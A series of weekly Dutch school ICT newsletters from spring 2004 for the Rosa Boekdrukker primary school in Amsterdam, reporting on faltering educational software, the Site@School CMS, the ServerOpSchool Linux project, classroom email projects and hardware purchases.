Het is de taak van de ouders om thuis met de kinderen te bespreken wat er wel en niet kan en mag op het internet. Wij merken, dat er steeds meer kinderen thuis een internetaansluiting hebben en op problemen stuiten. o.a.: ongewenste emails. Er moet op gehamerd worden, dat je je email adres nooit zomaar op het internet zet. (zie voorbeelden in: www.kindertent.nl e.d) 

ICT op APV

Op de Algemene Personeelsvergadering, deze week, was ICT een van de onderwerpen. Iedereen kreeg de gelegenheid te spuien wat er wel of niet goed gaat.
De onderbouw wordt voornamelijk gehinderd door programma´s die het niet doen (Letterpret) of programma´s die heel omslachtig zijn bij het wisselen van leerlingen (Alles Telt).
Wat zou het toch handig zijn, als alle problemen die ontdekt worden door de gebruikers ook meteen opgelost zouden worden door de makers. Bij ons Open Source programma (Site@School) worden ideeën en problemen van gebruikers zo snel mogelijk aangepakt. Dat zou nou bij educatieve programma´s ook moeten gebeuren.
In de bovenbouw zijn de ICT-problemen enerzijds organisatorisch (hoe organiseer je je onderwijs zo, dat alle leerlingen de opdrachten doen) en anderzijds ervaren enkele leerkrachten hun eigen ICT-deskundigheid nog als een knelpunt.
Ook waren er geluiden te horen: krijgt ICT te veel aandacht?
Interessante onderwerpen om de komende periode verder te onderzoeken.

Camera

We hebben een nieuwe Canon Powershot A60 camera. Nu kunnen we onze groothoeklens gaan gebruiken. Daarmee kun je in kleine ruimtes goede opnames maken, of kan de hele gymzaal vol met kinderen op 1 foto krijgen. 

TECHNISCH

Vorderingen S@S

Nu we Gerard Roos in ons midden hebben werken hij en Fred samen aan een nieuw standaard template voor S@S dat aan alle standaarden gaat voldoen. Goed werk heren! Dirk is standaard-freak en dol op OSS/GPL zaken die aan standaarden voldoen.
Verder is het denkproces over de mailinglists module gestart. Met deze module kunnen nieuwsbrieven gemaakt worden. Denk bijvoorbeeld aan de BIC (dat is een nieuwsbrief), een nieuwsbrief aan de ouders (dat doet de Emmaschool in Bussum al een hele tijd) en bijv. een nieuwsbrief aan leerkrachten.
Het is een ingewikkelde klus en ideeën zijn welkom. 

NIEUW MORSETEKEN.

Voor het eerst sinds de Tweede Wereldoorlog is er een nieuw teken aan het morse-alfabet toegevoegd: het apenstaartje.
Bron: CJ Online, onze taal.
Omdat wij ook voor de talloze lezers die nog morse gebruiken actueel willen zijn geven we hier de tekens. Het is een combinatie van A en C zonder spatie, dus ".--.-." ( dot dash dash dot dash dot). 't Is even wennen zo'n nieuw teken … 

Goede vakantie.
Karin
Dirk

2004-03-12 w11

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 11 - 2004 (12 maart)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDEWIJSKUNDIG

Evaluatiegesprek ABC-Rosa B

Naar aanleiding van de het uitgezette ICT traject tijdens de eerste helft van ons schooljaar hebben we (ABC, directie en ict-coördinatie) deze week om de tafel gezeten en hebben een paar voorzichtige conclusies getrokken.
- door het nog steeds niet functioneren van Letterpret is afgesproken beleid in de kleuterklassen mislukt
- in groep 3 t/m 8 worden nog wat organisatorische problemen geconstateerd. In bouwvergaderingen zal daar aandacht aan besteed worden.
- ICT moet niet als apart vak worden gezien, maar als onderdeel van elk vak, een werkwijze die bij elk vak gehanteerd kan worden, waar nodig.
- ter compensatie van het falen van Letterpret zal het ABC (onze OBD) gevraagd worden om bij het rekenprogramma ALLES TELT hun rekendeskundige in te schakelen ter ondersteuning van ons onderwijs
- Remediërende programma´s moeten beter benut worden. We weten te weinig hoe we ze moeten inzetten.
- Digiwijzer wordt vanaf volgende week ingezet om leerlingen te helpen leren zoeken (in teksten, op internet)
- volgende week gaan Karin en Monique aan de gang om voor de groepen 4 en 5 de opdrachten voor de komende periode uit te werken. Karin kan het niet alleen.

Bezoek ICTopSchool (www.ictopschool.net)

De stichting ICTOPSCHOOL was deze week bij ons op bezoek om te informeren wat wij met OpenSource software doen. We hebben uitgebreid verteld wat we tot nu toe hebben gedaan (S@S), waar we mee bezig zijn (SOS, zie onder) en wat we vinden van educatieve software zoals die tot nu toe op de markt gebracht wordt (weinig open voor kritiek en suggesties uit het veld)

Bijeenkomst ICT-coördinatoren van stadsdeel De Baarsjes

Deze week vond een bijeenkomst plaats met alle ICT coördinatoren van ons bestuur. We hebben gebrainstormd hoe we elkaar kunnen helpen/hoe we van elkaar kunnen leren. We hebben afgesproken om voorlopig 1x per twee maanden bij elkaar te komen. De hulp aan elkaar zal divers zijn. Zowel op technisch als op didactisch gebied zal onderlinge uitwisseling gaan plaats vinden. Technisch zullen we elkaar niet overal kunnen ondersteunen, maar op didactisch gebied wel.

Letterpret.

Ondanks allerlei toezeggingen, dat Letterpret na de Krokusvakantie zou functioneren, is dit tot op heden nog niet het geval. Wel hebben we een mailtje van Malmberg ontvangen, dat de cd met de nieuwe install methode eraan zit te komen.

tja…… Wordt het weer tijd voor wat dreigen?

TECHNISCH

Werkzaamheden in de Krokusvakantie..

In de krokusvakantie heeft Dirk bijna alle computers van een nieuw image voorzien. Dat betekent, dat de virus update nu bijna overal in orde is. Ook werkt EducatB op alle schoolcomputers van het type DELL G1. De upgrade van Educatb versie 6 naar 7 verliep niet voorspoedig. We hebben de zaak in behandeling bij de bibliotheek Vandaag kwam er bericht dat er een foutje was gevonden in het printen van etiketten. Misschien zit er nog een bugje in de nieuwe versie??

S@S

Versie 2.1 zit er aan te komen. Er blijven nog bugjes gevonden worden. Iedereen wereldwijd bedankt!

SoS

Een nieuw initiatief van de OBSRB. ServerOpSchool: We gaan in samenwerking met 3 andere scholen onze eigen server ontwikkelen. We zoeken scholen die mee willen doen in dit proces om te komen tot een ijzersterk product. Lees er alles over op http://serveropschool.nl Binnenkort meer nieuws.

Mailserver

We krijgen regelmatig onbestelbare mail vanuit de BIC retour. Mensen willen wel eens van adres veranderen en dat vergeten door te geven. Tijd om de boel eens op te schonen. Wie heeft het goede adres van Professor Frissen? Als iemand de BIC niet meer ontvangt, wil ie zich dan melden

Groet en goed weekend,
Karin,
Dirk

2004-03-19 w12

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 12 - 2004 (19 maart)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++
ONDERWIJS

Freudenthal Instituut

Op de website www.fi.uu.nl staan hele goed rekenspellen/oefeningen. Bij ThiemeMeulenhoff op de website staat beschreven welke spellen passen bij welke blokken van de methode Alles Telt. Idee voor andere uitgevers? Uit de beschrijving valt in ieder geval op te maken wat voor soort oefeningen het zijn. Dus kijk even bij:
http://www.allestelt.nl/allestelt/pagina.asp?pagkey=27780

Malmberg

Tik in in Google: malmberg +klachten!!
Dat stuk is nu ook op onze eigen site ondergebracht. http://rosaboekdrukker.net/index.php?section=6
Deze week weer eens een telefoontje naar Malmberg: waar blijft de nieuwe installatie cd? antw:  er zijn nog wat problemen met de nieuwe installatie zonder beveiligingssleutel. En het bedrijf in POLEN heeft Letterpret niet als prioriteit!
Maar meteen de volgende dag kwam er bericht, dat het deze vrijdag op de post naar ons gaat. Wie weet hebben we volgende week eindelijk eens een reden om te trakteren.

ICT leerlijn

- kleuterbouw
Omdat bij de kleuterbouw de ICT leerlijn niet lukt door de problemen met Letterpret (the never ending story) gooien we de onderwijsinhoud om: we gaan even het accent leggen op rekenen bij de kleuters. Daarvoor is de expertise ingeroepen van een rekendeskundige medewerker van onze onderwijsbegeleidingsdienst. Zij zal de didactiek van Alles Telt begeleiden.
- groep 4 en 5
Nieuwe opdrachten zijn deze week door Monique en Karin opgesteld. We doen geen email project, maar we hebben wel een manier bedacht om de leerlingen toch te laten emailen. o.a. zullen we de leerlingen van groep 5 hun product laten emailen naar Karin door te klikken in Word op bestand>verzenden (als bijlage)
- groep 6, 7 en 8
Digiwijzer is als testversie geïnstalleerd op de server. Het is een programma, door het ABC (onderwijsbegeleidingsdienst) ontwikkeld is, met als doel om leerlingen systematisch te leren zoeken in teksten en op internet. (zie foto http://rosaboekdrukker.net/index.php?page=615&navpath=,1320&contents=1321,1322,1391,1402&section=15&ID=1402&gallerypage=1)

Printen

In de bovenbouw is een aantal kinderen dat veel papier verbruikt met printen. Deze week presteerde een leerling het om haar werkstuk wel 5x af te drukken. Zo ongeduldig, als het er niet meteen uitkomt. “Ik heb maar één keer gedrukt!” Hier is beleid nodig!!!! Suggesties?? Graag!!

Tafels

Er zijn 7 tafels besteld van 200 x 80 cm. Op wielen. Deze moeten allerlei vreemde constructies vervangen. Op elke tafel komen twee computers met genoeg werkplek ernaast om een boek of papier op te leggen. 

Basiseducatie

De basiseducatie (Nederlandse les die aan ouders wordt gegeven) wil ook graag gebruik maken van onze computers. Dirk probeerde hun programma IJsbreker te installeren, maar het bleek geen netwerkversie te zijn. Nog even wachten, dus.

Website

Deze week heeft een leerkracht instructie gehad om ook foto´s op de website te kunnen zetten. Nodig op een computer om het te doen:
- een programma om de files te hernoemen   (bv rename files -http://renamefiles.it-falke.com)
- een programma om de foto's te verkleinen (bv. pixresizer http://bluefive.pair.com)
- een programma om de foto's te bekijken en simpele bewerkingen mee uit te voeren (bv. irfanview http://www.irfanview.com
Maar behalve dat, heb je ook nog een UNZIP programma nodig om de bovengenoemde gedowloade programma's mee te unzippen.

TECHNIEK

S@S

Het manual voor versie 2.1 is op een paar punten en komma's na af. Te bekijken op http://wyxs.net/man2-1/

SoS

Maandag zaten Dirk en Peter samen met Jos van de Sterrenwacht in bespreking over 'meedoen'. Ze doen mee! 

Drie scholen zitten nu in het ServerOpSchool project:

- OBS Rosa Boekdrukker in A'dam West
- OBS Joop Westerweel idem
- Jenaplanschool 'De Sterrewachter' in Loosdrecht

Kijk vooral op http://serveropschool.nl en bekijk of het je wat lijkt ook deel te nemen in dit initiatief.

IMAGE

We hebben 40 harde schijven besteld omdat de schijfjes die in onze 40 leerlingcomputers zitten te klein zijn. De kleinste is 1,5 Gigabyte en dat bepaalt de grootte van het image.
1,6 G is net te klein. We bestelden 4,3 G. schijven en dat is groot zat. Daar kunnen alle programma's op die in alle bouwen gebruikt worden.
Ter vergelijking: de meest vervuilde computer waarop we 'alles' hebben staan is voor 3,2 Gig gevuld.

ESIS

Volgende week donderdag wordt Esis voor Linux geïnstalleerd op één van onze servers. We laten het door Rovict (leverancier ESIS doen omdat we dan bij eventuele problemen geen verantwoordelijkheden hebben.

HARDWARE

Nieuw CMOS batterijtje in computer 46. Nieuw toetsenbord aan ESIS computer. Muis schoongemaakt. 

Groet en goed weekend,
Karin,
Dirk

2004-03-26 w13

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 13 - 2004 (26 maart)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS, onze ICT-leerlijn

Digiwijzer

Vorige week zijn we met alle bovenbouw (6 t/m 8) groepen begonnen met het programma Digiwijzer (in ontwikkeling bij onze begeleidingsdienst, het ABC www.stgabc.nl)
Vorige week werkte het heel erg langzaam in het netwerk. Vervolgens is het programma op de harde schijven gezet (image). Nu werkt het allemaal als een zonnetje. Het valt wel op hoe lui de kinderen zijn. Ze willen te snel en opschieten en lezen dan niet goed. Dus enige begeleiding is zeer gewenst.

Groep 4.

We waren nog aan het zoeken naar een manier om groep 4 aan het emailen te brengen in samenhang met de taalmethode. Op een werkoverleg is een leuk plan ontstaan. Groep 4 en 7 gaan samen werken aan een verhaal uit het taalthema van groep 4. Groep 4 heeft als opdracht om in Paint een fantasievervoermiddel te tekenen.  Elk kind zal samen met een leerling uit groep 7 een verhaal schrijven (om de beurt een stukje) bij dat vervoermiddel. Dat verhaal komt via de mail tot stand. Het plan was eerst heel anders, maar door er samen over te brainstormen in een groepje van 5 personen kwam er werkbaar plan uit waar iedereen enthousiast over is.

Groep5

Werkt aan "Het grote fantasieboek van groep 5". Vandaag is de titelpagina als volgt tot stand gekomen. (doel: samenwerken en werkstukken samen maken en samenvoegen. Voorkennis: in paint werken, tekst in paint zetten, kopieren plakken in paint. Figuur invoegen in word) Twee leerlingen zaten aan twee computers naast elkaar en maakten beiden in Paint een tekening. Allebei de werkstukken werden opgeslagen. Op de computer van leerling 1 werd daarna van de server het werkstuk van leerling 2 opgehaald. Het figuurtje van leerling 2 werd uitgeknipt en daarna in werk van leerling 1 geplakt. Dat werk werd weer als figuur ingevoegd in word.
Zie: hier

Kleuterbouw

Alles Telt
Na de ingrepen van Peter lijkt Alles Telt nu goed te werken. Bedankt voor de vlotte afhandeling van dit klusje, Peter. En lees ook maar meteen het volgende bericht.
Letterpret
Eindelijk!! De CD is binnen. Zou dan toch voor de Pasen Etterprut draaien. Peter??

TECHNISCH

muizen

We hebben weer een doos muizen gekocht. Het inzicht groeit hier dat muizen gebruiksmateriaal zijn. Net als toetsenborden.
Als ze niet meer werken, gooi je ze weg. Dat is het goedkoopst.
We hebben nu een partij imitatie Logitech optische muizen.
Voor EUR 7.50 per stuk. Optisch, want minder stof en zand (kleuters).

card readers

En toen we toch bij de PC Dokter waren (onze favoriete leverancier, want om de hoek, aardig, service gericht), kochten we ook twee cardreaders om de flashcards van de camera's makkelijk te kunnen uitlezen. Kost ook niks meer tegenwoordig.

anti virus

We worden in Nederland gebombardeerd met emails met virussen. Ze worden goed tegengehouden door het virusprogramma. Jammer dat onze provider (UPC) ze nog niet tegenhoudt.

Beeldscherm

We hebben bij de administratie computers een aantal flatscreens gekocht. Nu is er één waarbij als je Outlook Express start en Norton Antivirus, de letters vrijwel onleesbaar worden. Dus we denken: een virus. Maar we kunnen het antivirus programma niet goed bedienen, omdat het allemaal vrijwel onleesbaar is. Dat wordt dus opnieuw configureren. Dan hebben we ook meteen een schoon image voor de rest van die serie computers.

Nieuwe printers

We hebben twee nieuwe HP printers. De Laserjet 1300n was DOA (Dead On Arrival).

Esis

We hebben onze derde server draaien.
1. Router, firewall, web, mail,
2. Fileserver en 2e webserver (voor rekenweb)
3. Esis server
We wilden al een tijd Esis (leerlingadministratie, leerlingvolgsysteem, financiële administratie) in een netwerk.
Uit veiligheidsoverwegingen en redundantie besloten we een aparte server te nemen. Deze is identiek aan No. 2 zodat in geval van nood disks verwisseld kunnen worden (er zitten verwisselbare HD's in).
We hebben de installatie uit laten voeren door meneer Esis i.v.m. verantwoordelijkheid. En we willen ook niet aan de server zitten, behalve een backup systeem installeren.
Gedurende een proefperiode blijven we een oude Esis stand-alone versie gebruiken naast de netwerkversie. Als het systeem goed blijkt te werken gaan we in de zomervakantie over migreren.

S@S

Weer twee nieuwe sites erbij die s@s gebruiken:

http://www.carrousel.nl/
http://www.zebra-ijmuiden.nl/

Ons totale lijstje is te bezichtigen op onze download site:http://siteatschool.sourceforge.net/index.php?section=6

Release datum versie 2.1

De release datum nadert. Het wordt 31 maart, en niet 2 april.

Nieuwe modules

Fred is begonnen aan de ontwikkeling van twee nieuwe modules :
- de felbegeerde chat. de OBSRB en de Sterrewachter hebben grote belangstelling. Is ie nog niet af?
- een nieuwsbrieven module. Dirk testte de eerste nauwelijks werkende versie en is zeer enthousiast.

Als jullie ideeën hebben voor functies in deze modules zijn ze van harte welkom. Schrijf naar info@rosaboekdrukker.net

LAATSTE NIEUWS:

Het hosting bedrijf B&C Netservice in samenwerking met Flits Hosting biedt webhosting aan voor scholen. Als lokkertje gebruiken ze S@S. We hebben met ze afgesproken dat ze namen doorgeven van scholen die S@S gebruiken. Uit hun email:

Iemand tipte ons dat Site@School een fraai, eenvoudig en relatief laagdrempelig CMS pakket voor scholen is. Bovendien gemaakt door mensen met affiniteit in het onderwijs. We ebben het bekeken, getest en zijn enthousiast geworden. Zo enthousiast dat we hebben besloten dit standaard te installeren bij het webhostingpakket!

Dat mogen de dame en heren van S@S in hun …. steken! 

Goed weekend,
Karin
Dirk

2004-04-02 w14

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 14 - 2004 (2 april)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Klokhuis agenda

Tot het einde van het schooljaar is bekend wat er op Klokhuis te zien zal zijn. Kijk op onze site http://rosaboekdrukker.net/index.php?page=658&section=4 

Alles Telt

Patch geïnstalleerd. Tot nu toe gaat het programma voor de kleuterbouw prima. Door die patch is het gemakkelijker om het programma te verlaten en een andere leerling te kiezen.

Printers

De nieuwe printer van het kantoor leek DOA (dead on arrival) Maar niet heus. We leren steeds bij. De helpdesk meldde: eerst de software installeren, dan pas de printer aan de computer hangen. Dat hadden we verkeerd gedaan. De printer is nu gedeelde printer voor de administratieve computers (4x) en netwerkprinter (via een cross-utp kabel) voor de stand alone Esis computer. Zo hangt de Esis computer niet aan het netwerk, maar wel aan de printer. Dit alles uit veiligheidsoverwegingen.

Groep 4

Werkt druk aan het fantasievervoermiddel (in PAINT) waarbij ze met leerlingen uit groep 7 een verhaal zullen gaan schrijven.

Video camera

Deze week maakte een docent die de naschoolseactiviteit “streetdance” met leerlingen uit de bovenbouw doet, een opname met een digitale videocamera. Die opname kan in ons ALLBUM (de module waarin wij onze foto’s hebben) vertoond worden. Nu zoeken we nog de software die bij die camera hoort. Anders kan het er nog niet in.

KPN onderwijsactie. Aanbod gratis internet.

Op 5 april maakt de KPN bekend wat de levering van gratis internet aan scholen zal inhouden. We wachten vol spanning af, want we willen graag een tweede provider erbij hebben: voor de zekerheid. Als de kabel uitvalt, hebben we ADSL en omgekeerd. Bovendien zullen we beiden tegelijk gaan gebruiken, zodat als extra supersnel zal gaan!. E.e.a. is nog in onderzoek, omdat het ook wel ingewikkeld en kwetsbaar schijnt. 

Tafel

De eerste bestelde tafel-op-maat is vandaag uitgeprobeerd. 

TECHNIEK

Letterpret.

We kregen een CD van Malmberg. Functioneerde maar half. Een installatie op een stand-alone computer lukte maar een netwerkinstallatie lukt niet. Het bleek en bug in de installer te zijn. We schreven het aan Malmberg, die het ook ontdekt hadden. Ze sturen een nieuwe CD als het probleem in Polen verholpen is. Ze zeggen dat dat deze week is. Maar ja, dat hoorden we vaker….

S@S nieuws

Op 31 maart lanceerden we, geheel volgens de planning, versie 2.1 We zijn apetrots:
1. Dat we weer op tijd leveren. Dit in tegenstelling tot veel commerciële aanbieders van software
2. Dat er twee nieuwe modules bij zitten: een agenda en  een  kalender.
3 Veel grote en kleine verbeteringen, bugfixes, etc. etc.

Ook via deze weg willen we allen bedanken die hun tijd en energie hebben gegeven aan deze versie. Door testen, vertalen, aanvragen voor verbeteringen, het inzenden van bug reports, door opbouwende kritiek etc. etc.
Onze speciale dank gaat uit naar Fred Stuurman, de onderhouder en hoofd-coder van het project. Door zijn niet aflatende inzet, grote betrokkenheid en hulpvaardigheid (in het Forum en daarbuiten) kon dit project uitgroeien tot een CMS dat overal ter wereld met plezier gebruikt wordt. 

Een prettig weekend toegewenst!
Dirk
Karin

2004-04-09 w15

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 15 - 2004 (8 april)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

ONZE ICT LEERLIJN

Groepen 6, 7 en 8 zijn weer druk bezig geweest met Digiwijzer. Om dit zo goed mogelijk te doen is het raadzaam, dat de leerkracht er in de klas over napraat: hebben ze de aanwijzingen gevolgd die gegeven werden in de hulpaanwijzingen? Er werd bijvoorbeeld niet goed gelezen hoe je een plaatje op internet moet printen, waar je “kopjes” aan kan herkennen, etc.
Groep 4 is verder gegaan aan het voertuig en het verhaal dat er samen met een leerling van groep 7 bij geschreven zal gaan worden. Tijdens een gezamenlijke paasmaaltijd van groep 4 en 7, hebben de “koppeltjes” met elkaar kennisgemaakt. Na het paasweekend kan het mailen van start gaan. Er zijn extra computers voorzien van een emailaccount voor de desbetreffende groepen. Wij hebben niet voor elke leerling een emailadres, maar we hebben groeps-emailadressen.
Groep 5 is bijna klaar met de bladzijden van het grote fantasieboek van groep 5. Voor de schoolkrant worden alle smoezen verzameld op één bladzij. Voorbeeld:
“Ik ben te laat op school om dat de honden van de buren achter me aan rennen en ze hebben me huis werk opgegeten.” 
De leerlingen van groep 3 tikken steeds langere stukken.
In de kleutergroepen gaat het programma “Alles Telt” nog steeds goed. Op 20 april zal in een nascholingsbijeenkomst dieper ingegaan worden op de didactiek van het programma. Met Letterpret gaat het nog steeds niet goed. Alle Malmbergklachten staan verzameld op onze site: zie hier
Woensdag kregen we een nieuwe testversie binnen. We hopen dat die zich nu wel op een netwerk laat installeren. WE houden je op de hoogte.

Kleurenprinter

De nieuwe kleurennetwerkprinter is aangesloten in het netwerk. De bedoeling is, dat er wel werk van kinderen op geprint zal mogen worden, maar wel met zeer veel beleid. In de bovenbouw wordt nog heel onzorgvuldig met printerpapier (zwart-wit) omgegaan.

TECHNIEK

S@S

Deze week hebben Dirk en Karin Fred, namens de school, getracteerd op een etentje. Hij werkt zo keihard aan S@S houdt het S@S-forum in de gaten en verbetert constant de door iedereen opgemerkte zaken. Foto's van het etentje staan verstopt in ons Allbum.

Vorige week kwam versie 2.1 uit en meteen vlogen de statistieken weer omhoog. http://sourceforge.net/project/stats/index.php?report=last_7&group_id=60966

Image

Van een computer waar de oude versie van Veilig Leren Lezen op staat hebben we een image gemaakt. We hadden wel alle overbodige zaken van die computer afgehaald voor we het image maakten, maar het bleek toch niet erg schoon te zijn. Met het programma adaware (www.lavasoft.com) haalden we er heel veel spyware uit!

Tot zover,
Goed weekend en zalich Pasen.
Groet,
Karin
Dirk

2004-04-16 w16

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 16 - 2004 (16 april)
Wat is er deze week vanuit de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

GROOT NIEUWS GROOT NIEUWS GROOT NIEUWS

SERVER OP SCHOOL VAN START

Met genoegen delen we jullie mee dat het project 'ServerOpSchool' op 2 april van start is gegaan. Dit project is een samenwerkingsverband van vier basisscholen [1]. Zij hebben samen EUR 20.000 bijeengebracht om een Linux-server speciaal voor het basisonderwijs te laten ontwikkelen. De software is OSS/GPL en zal op termijn gratis ter beschikking worden gesteld.

Achtergrond

In de loop der jaren hebben wij gemerkt dat een basisschool zo zijn eigen eisen stelt aan servers, clients, software en hardware. Er lopen geen systeembeheerders rond en 'er is nooit tijd'. Op de OBSRB is de afgelopen jaren veel ontwikkeld dat gerust uniek kan worden genoemd. Het leek ons wenselijk deze ontwikkelingen een grotere verspreiding te geven, op een duurzame manier.

Na oriëntatie op 'de markt' bleek er geen partij te zijn die aan al onze behoeften kon voldoen en voldoende ontwikkel-continuïteit kon waarborgen.

Als er niets zou gebeuren, zou hetgeen op de OBSRB bereikt is, niet multipliceerbaar zijn. Na lang zoeken hebben we echter een oplossing gevonden die wel aan onze eisen voldoet. Op een stabiele basis van OpenNA Linux zal door Ingenieursbureau PSD datgene worden toegevoegd dat basisschool-specifiek is.

Het unieke van dit project zit hem de combinatie van

 1. De scholen hebben het heft van software-ontwikkeling in eigen hand genomen. Door samen te werken kunnen ze nu zaken ondernemen die als individuele school niet te financieren zijn. De samenwerking zal de vorm van een vereniging krijgen.
 2. Het is een loonvormend Linux project. Er wordt een, voor een dergelijk project, normaal honorarium aan de ontwikkelaar betaald.
 3. De continuïteit op de lange termijn is gewaarborgd als meer scholen meedoen. Zij kunnen (onder voorwaarden) lid worden van de vereniging.
 4. De continuïteit op de korte termijn is gewaarborgd door het in het leven roepen van een helpdesk die een aantal vormen van ondersteuning kent.

De scholen die in dit initiatief meedoen:
- OBS Rosa Boekdrukker, Amsterdam
- Jenaplanschool 'De Sterrewachter', Loosdrecht en Hilversum
- OBS Joop Westerweel, Amsterdam
- OBS Corantijn, Amsterdam

Meer informatie kunt u vinden op http://serveropschool.nl. Mocht u belangstelling hebben om in dit initiatief deel te nemen, dan verwijzen wij u naar de website.

Met vriendelijke groet en beleefd aanbevelend,

Karin
Dirk

2004-04-21 w17

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 17 - 2004 (23 april)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Lees over onze primeur, verder onderaan deze nieuwsbrief!!!!

ONDERWIJS - onze ICT leerlijn

Nascholing Alles Telt

Deze week hebben we gekeken met het ABC (schoolbegeleidingsdienst) hoe het programma Alles Telt gaat. Dit was een soort noodgreep, omdat Letterpret NOG STEEDS HET NIET GOED DOET IN HET NETWERK!!!

Miep, onze rekenspecialist van de onderwijsbegeleidingsdienst heeft in de kleutergroepen gekeken hoe de leerlingen aan het werk waren met het programma. In de bijeenkomst na schooltijd is de werking van het programma besproken, maar ook het ermee omgaan. Tip van Miep: 1x per week met een groepje kleuters één onderdeel van het programma doen en bespreken. Uitlokken van een oplossing. Als dit met de 18 onderdelen, verspreid over twee jaar gebeurt, dan haal je meer uit het programma.

Alles Telt - patch

We hebben een patch (reparatie-stoplapje) ontvangen, waarmee in het programma gemakkelijker van beurten gewisseld kan worden en ook een tijdslimiet voor de beurten ingesteld kan worden. Jammer genoeg moet er weer een helpdesk aan te pas komen om te zorgen dat de installatie gaat lukken.

Opruiming magazijn

In het hok, dat vroeger boekenmagazijn was, maar nu het SERVERHOK, is gebrek aan ruimte. Er staan nu drie servers. Er staat er nu namelijk ook één voor ESIS. Hoe we met de ruimte omspringen is te zien op de foto: kijk hier.

Letterpret

Weer een testversie uitgeprobeerd die het niet deed. En nu is het alweer een paar dagen heel stil aan de kant van Malmberg! Karin is woest en wil ophouden met Letterpret

emailen groep 4 en groep 7

Er is een begin gemaakt om de verhaaltjes met foto’s te mailen van groep 4 naar groep 7. Binnenkort zal een voorpoefje te zien zijn op onze site.

TECHNIEK

ServerOpSchool

We hebben veel felicitaties ontvangen naar aanleiding van het starten van ServerOpSchool. De werkelijke inrichting van het geheel zal voor onze school in de zomervakantie zijn. Maar ook nu al kunnen we een beroep doen op Peter.

Forum S@S

In het forum van S@S zijn veel postings de laatste tijd. Steeds meer mensen gaan het programma installeren en gebruiken en hebben weleens vragen. Fred is altijd heel snel met het antwoorden. Neem eens een kijkje in het FORUM: http://rosaboekdrukker.net/phpBB2/index.php*

PRIMEUR!!!!

Deze week hebben wij een testversie van de NIEUWSBRIEVENMODULE op de site van de Rosa Boekdrukker gezet.  Deze module is een absolute klapper! Smul van de features:

- Onbeperkt aantal nieuwsbrieven mogelijk. Dus groep 8 kan een eigen nieuwsbrief hebben en die zelf beheren, maar ook de MR, de ouders, de teamnieuwsbrief, de ...
- Een nieuwsbrief kan door meerdere redacteuren beheerd worden (samenwerken!)
- Aan- en afmelden mogelijk via de website. Uitgebreid instelbare email-alerts aan de redacteur. Je hebt vrijwel geen omkijken naar het systeem.
- Abonnees kunnen wel/niet bijdragen insturen naar de redacteur van een nieuwsbrief.
- Je kunt nieuwsbrieven per e-mail en/of op je website publiceren.
- Een archief voor oude nieuwsbrieven,
- etc etc. Teveel op op te noemen.

Alle lezers van deze nieuws brief worden opgeroepen om als proefpersoon zich aan te melden om de volgende  BIC ook via aanmelding op de site te ontvangen. Neem een kijkje en meld je aan!! Je ontvangt dan twee exemplaren van de BIC (oude stijl en nieuwe stijl), en dat is voor de testers best interessant!

We hebben de BIC zo ingesteld dat eigen bijdragen mogelijk zijn. lees hier (te vinden onder ICT en dan ICT nieuwsbrief.)

S@S ICONEN

Barry Faas (winnaar Linux Programmeerwedstrijd 2003 en ontwikkelaar van Edukitty, het gereedschap voor ontwikkelaars van educatieve programma's ), Barry Faas dus, gaat de iconen van S@S restylen. Dat is hard nodig. Komen we eindelijk eens af van enkele treurigstemmende iconen en het ratjetoe dat er nu is.

Het gerucht gaat dat a.s. oktober de nieuwe versie van S@S uitkomt met de nieuwe iconen. Wij kunnen dit gerucht niet bevestigen, maar de hardnekkigheid ervan doet het ergste vrezen....

COMPUTERTAFELS

Onze nieuwe computertafels zijn klaar en geïnstalleerd. Ze zien er prachtig uit. Verrijdbaar, 2 meter lang. Er staan twee computers op en de kinderen hebben nu voldoende werkplek om met de computer en een boekje/schrift ernaast te werken.

De tafels waren goedkoper dan fabriekstafels. Dat komt doordat we ze door onze huissmid lieten maken: Domien Marlet van Fa. IJzersterk.
zie hier.

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-04-23 w17

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 17 - 2004 (23 april)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS - onze ICT leerlijn

Alles Telt - patch.

Om de beurtenwisseling en de tijdslimiet in te stellen is er van Thieme Meulenhoff een nieuw stukje software gemaakt. Die patch bleken we niet goed te hebben geïnstalleerd. Dat lag aan de gebruiksaanwijzing. Dat gaf de uitgever ruiterlijk toe. Kost wel een hoop tijd, al die onzorgvuldigheid. Nu is het wel geïnstalleerd en we kunnen ook zien, dat de installatie gelukt is, maar nu werkt die beurtenwisseling die is opgenomen in het programma nog niet. Na de meivakantie weer verder.

Letterpret (Malmberg)

Daar is deze week niets meer aan gebeurd. Werkt dus nog steeds niet. Een boze mail werkt natuurlijk allang niet meer.

